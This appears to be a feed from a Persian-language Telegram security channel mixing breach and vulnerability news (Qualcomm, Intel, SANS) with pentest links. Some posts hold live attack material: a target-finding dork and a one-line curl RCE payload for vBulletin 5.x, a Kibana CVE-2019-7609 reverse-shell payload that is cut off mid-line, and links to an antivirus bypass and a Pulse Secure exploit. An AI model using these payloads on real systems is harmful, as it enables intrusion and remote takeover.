امنیت اطلاعات
848 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
تیم امنیتی Checkpoint آسیب پذیری جدیدی را در پردازنده های Qualcomm کشف کرده است که بیش از یک میلیارد دستگاه تلفن همراه را در معرض خطر قرار میدهد.
پردازنده های Snapdragon که در دستگاه های اندرویدی شرکت های گوگل، سامسونگ، ال جی، شیائومی و … مورد استفاده قرار میگیرد به مهاجمان اجازه میدهد:
بطور کامل از گوشی جاسوسی کرده و تمام اطلاعات آن شامل تصاویر،ویدیوها،تماسها، صدای میکروفن و اطلاعات مکانی گوشی را دریافت کند
تمامی داده های موجود در گوشی را بصورت دائمی از بین ببرد
بدافزارها بصورت کامل میتوانند بر روی گوشی اجرا و غیر قابل حذف شوند.


شناسه های ثبت شده برای این آسیب پذیری ها:
CVE-2020-11201, CVE-2020-11202, CVE-2020-11206, CVE-2020-11207, CVE-2020-11208 and CVE-2020-11209


https://blog.checkpoint.com/2020/08/06/achilles-small-chip-big-peril/


#news
#android

@sec_nerd
بیست گیگابایت از اطلاعات حساس و سورس کدهای شرکت اینتل در دارک وب به فروش گذاشته شده است!


#news
#breach
#intel


@sec_nerd
نفوذ به مرسدس بنز و در دست گرفتن کنترل آن در کنفرانس بلک هت ۲۰۲۰

https://i.blackhat.com/USA-20/Thursday/us-20-Yan-Security-Research-On-Mercedes-Benz-From-Hardware-To-Car-Control.pdf


#iot #blackhat
#pentest

@sec_nerd
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
یکی از کارکنان شرکت SANS هک شد!
ایمیل این کارمند سنز با حمله ی فیشینگ توسط یک هکر ناشناس مورد نفوذ قرار گرفت و برخی قوانین فوروارد به آن اضافه شد که منجر به لو رفتن برخی اطلاعات غیرحساس گردید.

این اطلاعات شامل ۲۸ هزار آدرس ایمیل و عنوان شغلی، کشور محل زندگی و .. از کارکنان سنز می باشد.

شرکت SANS یک شرکت شناخته شده در عرصه آموزش امنیت سایبری میباشد.


https://www.sans.org/dataincident2020


#sans
#breach #news


@sec_nerd
CVE-2019-7609(kibana RCE) on right way by python2 scripts

- URI
/api/timelion/run

-Payload
{"sheet":[".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >


https://github.com/kisec/CVE-2019-7609

#kibana
#rce


@sec_nerd
راهکارهایی برای دور زدن Rate Limit



#bugbounty
#pentest


@sec_nerd
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ

از سال ۲۰۱۲ تا ۲۰۲۰


https://pentester.land/list-of-bug-bounty-writeups.html


#pentest
#bugbounty


@sec_nerd
فرا رسیدن تاسوعا و عاشورای حسینی(ع) را تسلیت و تعزیت عرض می نماییم.

@sec_nerd
دور زدن آنتی ویروس با استفاده از لودر 64 بیتی متاسپلویت

https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8


#msf
#windows
#pentest

@sec_nerd
اجرای دستور از راه دور بر روی Pulse secure ssl vpn

CVE-2020-8218

https://github.com/withdk/pulse-gosecure-rce-poc/blob/master/pulse-gosecure-rce.py


#rce
#pulse
#network


@sec_nerd